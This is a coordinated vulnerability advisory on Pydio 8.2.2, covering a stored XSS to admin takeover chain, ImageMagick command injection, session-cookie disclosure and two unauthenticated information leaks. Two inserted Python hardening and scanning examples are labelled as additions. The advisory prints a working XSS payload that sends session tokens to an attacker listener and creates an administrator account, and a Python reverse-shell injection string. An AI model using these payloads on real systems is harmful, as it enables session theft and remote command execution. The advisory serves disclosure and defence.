Pydio 8 Command Execution / Cross Site Scripting
Packet Storm (PACKETSTORM:152292), Mar 29, 2019, posted by Leandro Cuozzo, packetstormsecurity.com

SecureAuth - SecureAuth Labs Advisory
http://www.secureauth.com/  
  
Pydio 8 Multiple Vulnerabilities  
  
1. *Advisory Information*  
  
Title: Pydio 8 Multiple Vulnerabilities  
Advisory ID: SAUTH-2019-0002  
Advisory URL:  
https://www.secureauth.com/labs/advisories/pydio-8-multiple-vulnerabilities  
Date published: 2019-03-28  
Date of last update: 2019-03-28  
Vendors contacted: Pydio  
Release mode: Coordinated release  
  
2. *Vulnerability Information*  
  
Class: Argument Injection or Modification [CWE-88], Argument Injection  
or Modification [CWE-88], Information Exposure [CWE-200], Improper  
Neutralization of Input During Web Page Generation  
('Cross-site Scripting') [CWE-79], Information Exposure [CWE-200],  
Information Exposure [CWE-200]  
Impact: Code execution, Security bypass, Information leak  
Remotely Exploitable: Yes  
Locally Exploitable: Yes  
CVE Name: CVE-2019-10049, CVE-2019-10048, CVE-2019-10045, CVE-2019-10047,  
CVE-2019-10046, CVE-2019-10046  
  
3. *Vulnerability Description*  
Pydio [1] website states that:  
...Pydio, an open source EFSS (Enterprise File Synchronization and  
Sharing) solution that can be deployed On-Premise or in a Hybrid / Cloud  
environment. Pydio is available either through a Community distribution  
(Ideal for home use) that is free forever or an Enterprise which  
provides all the features, support and compliance to secure file sharing.  
Pydio is sold in more than 25 countries, from Cupertino to Singapore,  
and is used by leading brands around the world, such as Nikon, Credit  
Agricole, Dexia... Pydio also serves education and government clients,  
with major references such as Cambridge University (UK) and ADEME  
(France).  
  
Multiple vulnerabilities were found in Pydio 8 (latest version 8.2.2).
An attacker with regular user access to the application who tricks an
administrator into opening a shared URL bookmark through the application
can obtain the victim's session identifiers, impersonate him/her and
perform actions such as creating a new administrator account. After
gaining privileged access to the application, the attacker can leverage
another vulnerability to perform OS command injection with the
privileges of the user account running the web server.
  
4. *Vulnerable Packages*  
  
. Pydio 8.2.2 - Latest version at the time of testing.  
. Older versions are probably affected too, but they were not checked.  
  
5. *Vendor Information, Solutions and Workarounds*  
  
Pydio published v8.2.3 that fixes all the reported vulnerabilities.  
  
6. *Credits*  
  
These vulnerabilities were discovered and researched by Ramiro Molina  
from SecureAuth Security Consulting Services. The publication of this  
advisory was coordinated by Leandro Cuozzo from SecureAuth Advisories  
Team.  
  
7. *Technical Description / Proof of Concept Code*  
  
7.1. *Privilege escalation vector based on multiple vulnerabilities*
  
[CVE-2019-10049]  
By chaining vulnerabilities, an attacker with regular user access to the
web application can trick an administrator user into opening a link
shared through the application. The link opens a shared file containing
JavaScript code that is executed in the context of the victim user,
which lets the attacker obtain sensitive information such as session
identifiers (session cookie and secure token) and perform actions on
behalf of him/her.
  
Note: if the targeted users are not administrators, any other action on
behalf of those users can still be performed, for example to obtain
sensitive files stored in their accounts or to impersonate them.
  
Attack vector steps:  
  
1. Authenticated in the web application with a regular user account, go
to "My Files" and upload a file named for example pydio_xss.html (the
.html extension is required) with the following content. Once executed,
the PoC performs several requests to:
  
. Obtain a "secure_token" for the user, which is a CSRF prevention token.  
. Obtain the session cookie for the current user.  
. Send the two sensitive tokens to the attacker, this allows to  
impersonate the victim user.  
. Switch the current "repository" to the configuration context (ajxp_conf).
. Create a new user account named "admin99" with password "password1".  
. Change the user role of the created user to administrator.  
  
Note: change the IP address and port number (the example ones are the  
IP 192.168.56.1 and port 9999).  
  
PoC pydio_xss.html file:  
  
/-----
<html>
<body>
<script type="text/javascript">
console.log("Starting...");
// 1. Load the welcome page and scrape the SECURE_TOKEN (CSRF token) from it.
var req0 = new XMLHttpRequest();
req0.open('GET', "/welcome/", true);
req0.setRequestHeader("Accept","text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8");
req0.send();
req0.onload = function() {
  var res = req0.responseText.match(/SECURE_TOKEN.*?,/)[0];
  var secure_token = res.split(/"/)[2];
  // 2. get_sess_id returns the HttpOnly AjaXplorer cookie value in the body (see 7.3).
  var req1 = new XMLHttpRequest();
  req1.open('POST', "index.php", true);
  req1.setRequestHeader('Content-Type', 'application/x-www-form-urlencoded');
  req1.send("get_action=get_sess_id&secure_token=" + secure_token);
  req1.onload = function() {
    var session_cookie = req1.responseText;
    // 3. Exfiltrate both identifiers to the attacker's listener.
    var req2 = new XMLHttpRequest();
    req2.open('POST', "http://192.168.56.1:9999/creds", true);
    req2.setRequestHeader('Content-Type', 'application/x-www-form-urlencoded');
    req2.send("Session Cookie: " + session_cookie + "; secure_token: " + secure_token);
    req2.onload = function() {
      console.log("I just sent your protected session cookie.");
    };
    // 4. Switch "repository" to the configuration context.
    var req3 = new XMLHttpRequest();
    req3.open('POST', "/index.php", true);
    req3.setRequestHeader('Content-Type', 'application/x-www-form-urlencoded');
    req3.send("get_action=switch_repository&repository_id=ajxp_conf&secure_token=" + secure_token);
    req3.onload = function() {
      // 5. Create the admin99 user with the victim's (administrator) privileges...
      console.log("Creating a new admin user...");
      var req4 = new XMLHttpRequest();
      req4.open('POST', "/index.php", true);
      req4.setRequestHeader('Content-Type', 'application/x-www-form-urlencoded');
      req4.send("get_action=create_user&new_user_login=admin99&new_user_pwd=password1&group_path=&secure_token=" + secure_token);
      req4.onload = function() {
        console.log(req4.responseText);
        // 6. ...and set its PROFILE to "admin" through the role editor.
        console.log("Promoting user to admin...");
        var req5 = new XMLHttpRequest();
        req5.open('POST', "/index.php", true);
        req5.setRequestHeader('Content-Type', 'application/x-www-form-urlencoded');
        req5.send("get_action=edit&sub_action=post_json_role&role_id=AJXP_USR_%2Fadmin99&json_data=%7B%22ROLE%22%3A%7B%22ACL%22%3A%7B%7D%2C%22MASKS%22%3A%7B%7D%2C%22ACTIONS%22%3A%7B%7D%2C%22PARAMETERS%22%3A%7B%7D%2C%22APPLIES%22%3A%7B%7D%2C%22USER%22%3A%7B%22LOCK%22%3Afalse%2C%22PROFILE%22%3A%22admin%22%2C%22ROLES%22%3A%5B%22AJXP_GRP_%2F%22%2C%22AJXP_USR_%2Fadmin99%22%5D%7D%7D%2C%22METADATA%22%3A%7B%7D%2C%22USER%22%3A%7B%22LOCK%22%3Afalse%2C%22PROFILE%22%3A%22admin%22%2C%22ROLES%22%3A%5B%22AJXP_GRP_%2F%22%2C%22AJXP_USR_%2Fadmin99%22%5D%7D%7D&secure_token=" + secure_token);
        req5.onload = function() {
          console.log(req5.responseText);
        };
      };
    };
  };
};
</script>
</body>
</html>
-----/
  
2. Still in "My Files", create a new URL bookmark with the following URL
and a label of your choice. Note that a convincing label helps to trick
an administrator user into opening the bookmark. The URL must reference
the file name uploaded in the previous step; for this example the file
is named "pydio_xss.html":
  
/-----  
http://192.168.56.102/index.php?get_action=open_file&repository_id=inbox&file=%2Fpydio_xss.html  
-----/  
  
3. Select the uploaded HTML file and share it with the administrator
user account: click on share and, in the popup window, select the
target user (or several users if the administrator account is not known)
and click on save.

4. Do the same with the URL bookmark and share it with the victim
administrator user(s).

5. On the attacker's machine, start a listener (for example with ncat)
for the incoming POST request carrying the session identifiers.
  
6. Once the administrator opens the URL Bookmark the JavaScript code in  
the uploaded file will be executed, the session identifiers will be  
posted to the attacker's machine and a new administrator user (named  
"admin99" with password "password1") will be created.  
  
7. The attacker can login with the created administrator user or can  
leverage the session identifiers to impersonate the victim user.  
  
Note: after gaining administrator access to the web application, an
attacker can leverage the OS command injection vulnerability described
in this advisory to run system commands on the underlying operating
system as the local user running the web server.
  
7.2. *OS command injection by parameter abuse in ImageMagick plugin*  
  
[CVE-2019-10048]  
The 'ImageMagick' plugin that is installed by default in Pydio 8.2.2
does not validate or sanitize the user-supplied values of the plugin's
configuration options, so arbitrary shell commands can be entered that
result in command execution on the underlying operating system with the
privileges of the local user running the web server. The attacker needs
to be authenticated with an administrator account in order to edit the
affected plugin configuration. This advisory also describes (section
7.1) a privilege escalation vector from a regular user account that
leverages the other reported vulnerabilities.
  
Proof of Concept:  
  
1. Logged in with an administrator account into the web application,  
go to Settings -> Editors.  
  
2. Disable the PDF Viewer plugin.  
  
3. Enable the ImageMagick plugin.  
  
4. Click on Edit ImageMagick plugin settings.  
  
5. In the popup window, append the following example payload to the
current values of the "Thumbs options" and "Images options" parameters
and save the settings. The payload runs a Python reverse shell (in the
example the IP address is 192.168.56.1 and the port number is 9999,
edit accordingly):
  
/-----
; python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("192.168.56.1",9999));os.dup2(s.fileno(),0);os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);';
-----/
  
6. On the attacker's machine, start a listener (for example with ncat)
for the incoming reverse shell.

7. With the administrator account, or any other account, upload a test
PDF file to a workspace and observe that a reverse shell is received
(with the PDF Viewer disabled, the ImageMagick plugin is the one that
renders the PDF preview and runs the injected command).
  
Affected source code:

The affected code is located in the file
"plugins/editor.imagick/IMagickPreviewer.php" at line #380. The section
below is where the vulnerability lies: the administrator-provided
options ("IM_CUSTOM_OPTIONS", "IM_VIEWER_QUALITY", "IM_THUMB_QUALITY")
are neither validated nor sanitized before the "$cmd" string is built
and passed to exec(). Only the two file arguments go through
escapeshellarg().
  
/-----
$customOptions = $this->getContextualOption($ctx, "IM_CUSTOM_OPTIONS");
$customEnvPath = $this->getContextualOption($ctx, "ADDITIONAL_ENV_PATH");
$viewerQuality = $this->getContextualOption($ctx, "IM_VIEWER_QUALITY");
$thumbQuality  = $this->getContextualOption($ctx, "IM_THUMB_QUALITY");
if (empty($customOptions)) {
    $customOptions = "";
}
if (!empty($customEnvPath)) {
    putenv("PATH=".getenv("PATH").":".$customEnvPath);
}
// Admin-supplied options are concatenated verbatim; only the file arguments are escaped.
$params = $customOptions." ".( $this->extractAll ? $viewerQuality : $thumbQuality );
$cmd = $this->getContextualOption($ctx, "IMAGE_MAGICK_CONVERT")." ".$params." ".escapeshellarg(($masterFile).$pageLimit)." ".escapeshellarg($tmpFileThumb);
$this->logDebug("IMagick Command : $cmd");
session_write_close(); // Be sure to give the hand back
exec($cmd, $out, $return);
-----/
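The root cause is that the option strings are spliced into a single shell command line, so escapeshellarg() on the file names does not help. The safe shape is to tokenize the option strings, accept only known option names and plain values, and pass the result as an argv list to a process spawned without a shell. The following is an added example in Python standing in for the PHP above; it is not Pydio's code and not the 8.2.3 fix (the advisory does not describe that fix). The option allow-list, the file names and the stand-in payload are assumptions made for the example.

```python
"""Shell-string vs. argv construction of the ImageMagick convert command.

Added example (Python standing in for the PHP in IMagickPreviewer.php); it is
not Pydio's code and not the 8.2.3 fix, which the advisory does not describe.
The option allow-list and the file names are assumptions made for the example.
"""
import re
import shlex
import shutil
import subprocess

# Option names an administrator may legitimately set (assumed list; extend per deployment).
ALLOWED_OPTIONS = {"-resize", "-thumbnail", "-quality", "-density", "-strip",
                   "-colorspace", "-background", "-flatten", "-auto-orient"}
# Values: numbers, geometries (800x600, 50%), colour names or hex. No shell metacharacters.
VALUE_RE = re.compile(r"^[A-Za-z0-9%x+.#]+$")


def build_cmd_vulnerable(convert, custom_options, quality, master_file, thumb_file):
    """Mirror of the advisory's PHP: the admin-supplied options are pasted into one
    shell string; only the two file arguments get escapeshellarg()/shlex.quote()."""
    params = custom_options + " " + quality
    return "%s %s %s %s" % (convert, params, shlex.quote(master_file), shlex.quote(thumb_file))


def build_argv_hardened(convert, custom_options, quality, master_file, thumb_file):
    """Tokenize the option strings, accept only allow-listed option names and plain
    values, and return an argv list to run without a shell."""
    params = shlex.split(custom_options + " " + quality)  # ValueError on unbalanced quotes
    for tok in params:
        if tok not in ALLOWED_OPTIONS and not VALUE_RE.match(tok):
            raise ValueError("rejected ImageMagick option token: %r" % tok)
    return [convert] + params + [master_file, thumb_file]


def run_convert(argv):
    """Execute without shell=True so no token is ever re-parsed by /bin/sh."""
    return subprocess.run(argv, shell=False, capture_output=True, timeout=60).returncode


# Same shape as the advisory's payload (a reverse shell there; a harmless stand-in here).
PAYLOAD = "; python -c 'import os; os.system(\"id\")';"

if __name__ == "__main__":
    # "[0]" mirrors the $pageLimit suffix the PHP appends to the master file.
    args = ("convert", "-resize 50% " + PAYLOAD, "-quality 80", "/tmp/in.pdf[0]", "/tmp/thumb.png")
    print("vulnerable shell string:", build_cmd_vulnerable(*args))
    try:
        build_argv_hardened(*args)
    except ValueError as e:
        print("hardened:", e)
    argv = build_argv_hardened("convert", "-resize 50%", "-quality 80", "/tmp/in.pdf[0]", "/tmp/thumb.png")
    print("hardened argv:", argv)
    if shutil.which(argv[0]):
        print("convert exit code:", run_convert(argv))
```

Tokenizing with shlex.split and rejecting anything that is not an allow-listed option or a plain value stops `;`, `|`, backticks and `$(...)` before they reach a shell; passing an argv list with shell=False means that even a token that slipped through would be handed to convert as one argument rather than re-parsed by /bin/sh. The allow-list is the important part: ImageMagick has options such as -write that can touch the filesystem on their own, so accept names, not just "looks like an option".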
  
7.3. *Current user AjaXplorer session cookie value disclosure*  
  
[CVE-2019-10045]  
The 'AjaXplorer' session cookie is correctly set with the 'HttpOnly'
flag to prevent scripts from reading its value. However, the affected
'get_sess_id' action discloses the session cookie value in the response
body, which gives scripts access to it anyway. An attacker can reuse
this identifier to impersonate the user and perform actions on his/her
behalf while the session is still active.
  
Proof of Concept:  
  
The response to the following HTTP POST request with the parameter  
'get_action=get_sess_id' returns the current user session identifier  
('AjaXplorer' session cookie value) in the response.  
  
Request:  
  
/-----  
POST /index.php? HTTP/1.1  
Host: 192.168.56.101  
User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:64.0)  
Gecko/20100101 Firefox/64.0  
Accept: */*  
Accept-Language: en-US,en;q=0.5  
Accept-Encoding: gzip, deflate  
Referer: http://192.168.56.101/ws-inbox/  
content-type: application/x-www-form-urlencoded; charset=UTF-8  
origin: http://192.168.56.101  
Content-Length: 68  
Connection: close  
Cookie: AjaXplorer=1ln7fa60h1ajsapm7ha45sge26; ajxp_licheck=ok  
  
get_action=get_sess_id&secure_token=zZ6lpJaRUovEYm0imb839L8YhWI1UHZK  
-----/  
  
Response:  
  
/-----  
HTTP/1.1 200 OK  
Date: Wed, 30 Jan 2019 22:21:18 GMT  
Server: Apache/2.4.27 (Red Hat) OpenSSL/1.0.2k-fips PHP/5.6.25  
X-Powered-By: PHP/5.6.25  
Expires: Thu, 19 Nov 1981 08:52:00 GMT  
Cache-Control: no-store, no-cache, must-revalidate, post-check=0,  
pre-check=0  
Pragma: no-cache  
Connection: close  
Content-Type: text/plain;charset=UTF-8  
Content-Length: 26  
  
1ln7fa60h1ajsapm7ha45sge26  
-----/  
  
7.4. *Stored Cross-site scripting (XSS) in file view feature*  
  
[CVE-2019-10047]  
A stored cross-site scripting vulnerability exists in the affected web
application that can be exploited by leveraging its file upload and file
preview features. An authenticated attacker can upload an HTML file
containing JavaScript code; afterwards, a file preview URL can be used
to access the uploaded file, which the application serves inline with a
"text/html" content type. If the malicious user shares the uploaded HTML
file with another user of the application and tricks that authenticated
victim into accessing the preview URL (i.e. by clicking on a link), the
browser interprets the HTML and executes the included JavaScript in the
context of the victim's session.
  
Proof of Concept:  
  
With an authenticated user, go to "My Files" and upload an HTML file
such as the following PoC, named for example "xss.html":
  
/-----  
<html>  
<body>  
<script type="text/javascript">  
alert("SecureAuth");  
</script>  
</body>  
</html>  
-----/  
  
In another tab of the web browser access the following URL, and notice  
that the JavaScript code is executed, and a popup alert is displayed:  
  
/-----  
http://192.168.56.102/index.php?secure_token=&get_action=open_file&repository_id=1&file=%2Fxss.html  
-----/  
  
Request:  
  
/-----  
GET  
/index.php?secure_token=&get_action=open_file&repository_id=1&file=%2Fxss.html  
HTTP/1.1  
Host: 192.168.56.102  
User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:64.0)  
Gecko/20100101 Firefox/64.0  
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8  
Accept-Language: en-US,en;q=0.5  
Accept-Encoding: gzip, deflate  
Connection: close  
Cookie: AjaXplorer=gdn92c6maohf28lt2noiso1891; ajxp_licheck=ok  
Upgrade-Insecure-Requests: 1  
-----/  
  
Response:  
  
/-----  
HTTP/1.1 200 OK  
Date: Wed, 30 Jan 2019 22:00:21 GMT  
Server: Apache/2.4.34 (Red Hat) OpenSSL/1.0.2k-fips PHP/5.6.25  
X-Powered-By: PHP/5.6.25  
Expires: Thu, 19 Nov 1981 08:52:00 GMT  
Cache-Control: public  
Pragma: no-cache  
Content-Disposition: inline; filename="xss.html"  
Content-Length: 66  
Connection: close  
Content-Type: text/html; charset=us-ascii; name="xss.html"  
  
<html>  
<body>  
<script>alert("SecureAuth")</script>  
</body>  
</html>  
-----/  
  
Share the file with an administrator user. Then, logged in with that
user account, access the "Shared Files" repository and, in another tab,
access the following URL and notice that the JavaScript code is also
executed:
  
/-----  
http://192.168.56.102/index.php?get_action=open_file&repository_id=inbox&file=%2Fxss.html  
-----/  
  
Request:  
  
/-----  
GET /index.php?get_action=open_file&repository_id=inbox&file=%2Fxss.html  
HTTP/1.1  
Host: 192.168.56.102  
User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:64.0)  
Gecko/20100101 Firefox/64.0  
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8  
Accept-Language: en-US,en;q=0.5  
Accept-Encoding: gzip, deflate  
Connection: close  
Cookie: AjaXplorer=6vh2o75udh253f6lu8p99cpmr5; ajxp_licheck=ok  
Upgrade-Insecure-Requests: 1  
-----/  
  
Response:  
  
/-----  
HTTP/1.1 200 OK  
Date: Wed, 30 Jan 2019 22:01:05 GMT  
Server: Apache/2.4.34 (Red Hat) OpenSSL/1.0.2k-fips PHP/5.6.25  
X-Powered-By: PHP/5.6.25  
Expires: Thu, 19 Nov 1981 08:52:00 GMT  
Cache-Control: public  
Pragma: no-cache  
Content-Disposition: inline; filename="xss.html"  
Content-Length: 66  
Connection: close  
Content-Type: text/html; charset=us-ascii; name="xss.html"  
  
<html>  
<body>  
<script>alert("SecureAuth")</script>  
</body>  
</html>  
-----/  
  
7.5. *Unauthenticated Pydio and PHP libraries versions information  
disclosure*  
  
[CVE-2019-10046]  
An unauthenticated attacker can obtain the Pydio version and the list of
PHP libraries with their versions by performing an HTTP POST request to
'/index.php' with the parameters "get_action=display_doc&doc_file=CREDITS"
in the body.
  
Proof of Concept:  
  
Request:  
  
/-----  
POST /index.php? HTTP/1.1  
Host: 192.168.56.102  
User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:64.0)  
Gecko/20100101 Firefox/64.0  
Accept: */*  
Accept-Language: en-US,en;q=0.5  
Accept-Encoding: gzip, deflate  
Referer: http://192.168.56.102/welcome/  
content-type: application/x-www-form-urlencoded; charset=UTF-8  
origin: http://192.168.56.102  
Content-Length: 53  
Connection: close  
Cookie: AjaXplorer=a; ajxp_licheck=ok  
  
get_action=display_doc&doc_file=CREDITS&secure_token=  
-----/  
  
Response:  
  
/-----  
HTTP/1.1 200 OK  
Date: Wed, 30 Jan 2019 22:26:49 GMT  
Server: Apache/2.4.27 (Red Hat) OpenSSL/1.0.2k-fips PHP/5.6.25  
X-Powered-By: PHP/5.6.25  
Expires: Thu, 19 Nov 1981 08:52:00 GMT  
Cache-Control: no-store, no-cache, must-revalidate, post-check=0,  
pre-check=0  
Pragma: no-cache  
Connection: close  
Content-Type: text/plain;charset=UTF-8  
Content-Length: 9246  
  
<img src="plugins/gui.ajax/PydioLogo250.png"/>  
<br><div style="padding-left:10px;"><div  
style="font-size:0.8em;">Version 8.2.2 - 2018-10-10  
<br>Copyright 2007-2017 Abstrium SAS  
<br>The latest code can be found at https://pydio.com/.  
<br></div>  
...  
TRUNCATED  
...  
<br>  
<br><div class="title">PHP Libraries</div>  
<br>  
<br> aws/aws-sdk-php 3.19.18 Apache-2.0  
<br> commerceguys/guzzle-oauth2-plugin v2.1.1 MIT  
<br> dapphp/securimage 3.6.4 BSD  
<br> davegardnerisme/nsqphp dev-master 60f12ad none  
<br> evenement/evenement v2.0.0 MIT  
<br> firebase/php-jwt v2.2.0 BSD-3-Clause  
<br> gimler/guzzle-description-loader v0.0.4 MIT  
<br> guzzlehttp/command 0.7.1 MIT  
<br> guzzlehttp/guzzle 5.3.1 MIT  
<br> guzzlehttp/guzzle-services 0.5.0 MIT  
<br> guzzlehttp/promises 1.2.0 MIT  
<br> guzzlehttp/psr7 1.3.1 MIT  
<br> guzzlehttp/ringphp 1.1.0 MIT  
<br> guzzlehttp/streams 3.0.0 MIT  
<br> meenie/javascript-packer 1.1 LGPL 2.1  
<br> mtdowling/jmespath.php 2.3.0 MIT  
<br> nikic/fast-route v1.0.1 BSD-3-Clause  
<br> phpseclib/phpseclib 2.0.3 MIT  
<br> psr/http-message 1.0.1 MIT  
<br> psr/log 1.0.2 MIT  
<br> react/cache v0.4.1 MIT  
<br> react/child-process v0.4.1 MIT  
<br> react/dns v0.4.3 MIT  
<br> react/event-loop v0.4.2 MIT  
<br> react/http v0.4.1 MIT  
<br> react/http-client v0.4.13 MIT  
<br> react/promise v2.4.1 MIT  
<br> react/react v0.4.2 MIT  
<br> react/socket v0.4.3 MIT  
<br> react/socket-client v0.4.5 MIT  
<br> react/stream v0.4.4 MIT  
<br> sabre/dav 1.8.10 BSD-3-Clause  
<br> sabre/vobject 2.1.7 BSD-3-Clause  
<br> symfony/config v3.1.5 MIT  
<br> symfony/console v3.1.5 MIT  
<br> symfony/debug v3.1.5 MIT  
<br> symfony/filesystem v3.1.5 MIT  
<br> symfony/polyfill-mbstring v1.2.0 MIT  
<br> symfony/yaml v3.1.5 MIT  
<br> zendframework/zend-diactoros 1.3.7 BSD-2-Clause  
<br>  
<br>  
<br><div class="title">Other Plugins</div>  
<br> PThumb.php <a target="_blank"  
href="http://www.phpclasses.org">http://www.phpclasses.org</a> (LPGL)  
<br> OpenLayers <a target="_blank"  
href="http://www.openlayers.org">http://www.openlayers.org</a> (BSD)  
<br> Video-js <a target="_blank"  
href="http://www.videojs.com/">http://www.videojs.com/</a> (LGPL)  
<br> Zend Lucene <a target="_blank"  
href="http://www.zend.com/">http://www.zend.com/</a> (New BSD)  
<br> SoundManager : <a target="_blank"  
href="http://www.schillmania.com/projects/soundmanager2/">http://www.schillmania.com/projects/soundmanager2/</a>  
(BSD)  
<br> CAS Driver (Apache 2): https://github.com/Jasig/phpCAS  
<br>  
<br></div>  
-----/  
  
7.6. *Unauthenticated Pydio "Boot Config" information disclosure*  
  
[CVE-2019-10046]  
An unauthenticated attacker can obtain information about the Pydio
configuration, including session timeout and license information, by
performing an HTTP GET request to "/index.php?get_action=get_boot_conf".
  
Proof of Concept:  
  
Request:  
  
/-----  
GET /index.php?get_action=get_boot_conf HTTP/1.1  
Host: 192.168.56.102  
User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:64.0)  
Gecko/20100101 Firefox/64.0  
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8  
Accept-Language: en-US,en;q=0.5  
Accept-Encoding: gzip, deflate  
Connection: close  
Upgrade-Insecure-Requests: 1  
-----/  
  
Response:  
  
/-----  
HTTP/1.1 200 OK  
Date: Wed, 30 Jan 2019 22:42:53 GMT  
Server: Apache/2.4.34 (Red Hat) OpenSSL/1.0.2k-fips PHP/5.6.25  
X-Powered-By: PHP/5.6.25  
Set-Cookie: AjaXplorer=170a2docpbgl1509b2v98m90e3; path=/; HttpOnly  
Expires: Thu, 19 Nov 1981 08:52:00 GMT  
Cache-Control: no-store, no-cache, must-revalidate, post-check=0,  
pre-check=0  
Pragma: no-cache  
Set-Cookie: AJXP_GUI=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT;  
Max-Age=0  
Connection: close  
Content-Type: application/json  
Content-Length: 136855

{
"ajxpResourcesFolder": "plugins/gui.ajax/res",  
"ajxpServerAccess": "index.php",  
"zipEnabled": true,  
"multipleFilesDownloadEnabled": true,  
"customWording": {  
"welcomeMessage": "My Company File Sharing Platform",  
"title": "Pydio Enterprise",  
"icon": "plugins/gui.ajax/res/themes/common/images/LoginBoxLogo.png",  
"iconWidth": "250px",  
"iconHeight": "120px",  
"iconOnly": true,  
"titleFontSize": ""  
},  
"usersEnabled": true,  
"loggedUser": false,  
"currentLanguage": "en",  
"session_timeout": 1440,
"client_timeout": 1440,  
"client_timeout_warning": 3,  
  
...  
TRUNCATED  
...  
  
"helper_booster.updater.force.2": "force reinstall",  
"helper_booster.updater.force.3": "?"  
},  
"SECURE_TOKEN": "OCGdu2uIsEJUWYPHaPOV5V35pNPhSuDz",  
"streaming_supported": "true",  
"theme": "material",  
"ajxpImagesCommon": true,  
"licence_features": [  
"TRIAL",  
"footer",  
"splash",  
"customCopyright:<a href='https://pydio.com'>Pydio Enterprise  
Distribution</a> - Trial version valid until 2019-02-20."  
]  
}  
-----/  
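Sections 7.5 and 7.6 together give an unauthenticated client an exact product version, a dependency inventory and a fresh SECURE_TOKEN, which is what an external scanner needs to decide whether the instance predates the 8.2.3 fix. The following is an added example, not part of the SecureAuth advisory: it parses the two response bodies offline and reports findings. The sample responses are constructed from the excerpts shown above (the library list is shortened); the two fetch helpers send the request shapes from 7.5 and 7.6 and are only used against a live host.

```python
"""Parse the two unauthenticated Pydio disclosures (7.5 display_doc CREDITS,
7.6 get_boot_conf) and decide whether the instance predates the 8.2.3 fix.

Added example, not part of the SecureAuth advisory.  The sample responses are
constructed from the excerpts in the advisory; the request shapes used by the
fetch helpers are the ones shown in sections 7.5 and 7.6.
"""
import json
import re
import urllib.parse
import urllib.request

FIXED_VERSION = (8, 2, 3)   # Pydio 8.2.3 fixes all reported issues (section 5)

VERSION_RE = re.compile(r"Version\s+(\d+(?:\.\d+)+)\s+-\s+(\d{4}-\d{2}-\d{2})")
LIB_RE = re.compile(r"<br>\s+([\w.-]+/[\w.-]+)\s+(\S+)\s+(.+)")  # "<br> vendor/pkg version licence"


def version_tuple(v):
    return tuple(int(x) for x in v.split("."))


def is_fixed(version):
    """True when the reported version is at or above the vendor fix (8.2.3)."""
    return version_tuple(version) >= FIXED_VERSION


def parse_credits(body):
    """Version, build date and PHP library inventory from the CREDITS document."""
    m = VERSION_RE.search(body)
    libs = [(name, ver, lic.strip()) for name, ver, lic in LIB_RE.findall(body)]
    return {"version": m.group(1) if m else None,
            "build_date": m.group(2) if m else None,
            "libraries": libs}


def parse_boot_conf(body):
    """Security-relevant fields from the get_boot_conf JSON."""
    conf = json.loads(body)
    return {"logged_in": bool(conf.get("loggedUser")),
            "session_timeout": conf.get("session_timeout"),
            "client_timeout": conf.get("client_timeout"),
            "secure_token": conf.get("SECURE_TOKEN"),
            "licence_features": conf.get("licence_features", []),
            "title": conf.get("customWording", {}).get("title")}


def assess(credits_body, boot_body):
    """Findings a scanner would report for one host."""
    findings = []
    c = parse_credits(credits_body)
    if c["version"] and not is_fixed(c["version"]):
        findings.append("Pydio %s < 8.2.3: CVE-2019-10045..10049 unpatched" % c["version"])
    findings.append("%d PHP library versions disclosed pre-auth" % len(c["libraries"]))
    b = parse_boot_conf(boot_body)
    if b["secure_token"]:
        findings.append("get_boot_conf hands a SECURE_TOKEN to unauthenticated clients")
    if b["licence_features"]:
        findings.append("licence features disclosed: %s" % ", ".join(b["licence_features"]))
    return findings


def fetch_credits(base_url):
    """Live request with the 7.5 body (only for a host you are authorised to test)."""
    data = urllib.parse.urlencode({"get_action": "display_doc", "doc_file": "CREDITS",
                                   "secure_token": ""}).encode()
    with urllib.request.urlopen(base_url.rstrip("/") + "/index.php", data=data, timeout=10) as r:
        return r.read().decode("utf-8", "replace")


def fetch_boot_conf(base_url):
    """Live request with the 7.6 URL."""
    with urllib.request.urlopen(base_url.rstrip("/") + "/index.php?get_action=get_boot_conf",
                                timeout=10) as r:
        return r.read().decode("utf-8", "replace")


# Constructed samples: values copied from the advisory's excerpts, library list shortened.
SAMPLE_CREDITS = """<img src="plugins/gui.ajax/PydioLogo250.png"/>
<br><div style="padding-left:10px;"><div style="font-size:0.8em;">Version 8.2.2 - 2018-10-10
<br>Copyright 2007-2017 Abstrium SAS
<br><div class="title">PHP Libraries</div>
<br> aws/aws-sdk-php 3.19.18 Apache-2.0
<br> guzzlehttp/guzzle 5.3.1 MIT
<br> phpseclib/phpseclib 2.0.3 MIT
<br> symfony/yaml v3.1.5 MIT
<br></div>"""

SAMPLE_BOOT_CONF = json.dumps({
    "usersEnabled": True, "loggedUser": False, "currentLanguage": "en",
    "customWording": {"title": "Pydio Enterprise"},
    "session_timeout": 1440, "client_timeout": 1440, "client_timeout_warning": 3,
    "SECURE_TOKEN": "OCGdu2uIsEJUWYPHaPOV5V35pNPhSuDz",
    "licence_features": ["TRIAL", "footer", "splash"],
})

if __name__ == "__main__":
    for finding in assess(SAMPLE_CREDITS, SAMPLE_BOOT_CONF):
        print(finding)
```

The library tuples are the useful by-product: vendor/package plus exact version is enough to match the instance against third-party advisories for guzzle, phpseclib, symfony and the rest without touching an authenticated endpoint.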
  
8. *Report Timeline*  
2019-02-11: SecureAuth sent an initial notification to Pydio including
a draft advisory.
2019-02-11: Pydio confirmed the reception of the advisory.
2019-02-15: Pydio informed SecureAuth that they were testing the
vulnerabilities and would answer back the following week.
2019-02-15: SecureAuth thanked Pydio for the update.
2019-02-20: Pydio requested a clarification about some of the
vulnerabilities.
2019-02-21: SecureAuth sent additional information to Pydio.
2019-03-08: SecureAuth requested an update.
2019-03-08: Pydio replied that they were planning to release their fix
the following week and asked SecureAuth to test the new version.
2019-03-08: SecureAuth thanked Pydio for the update and agreed to test
the new version.
2019-03-12: Pydio sent the fixed version.
2019-03-15: Pydio asked for an update and proposed to release its fix on
Tuesday the 19th.
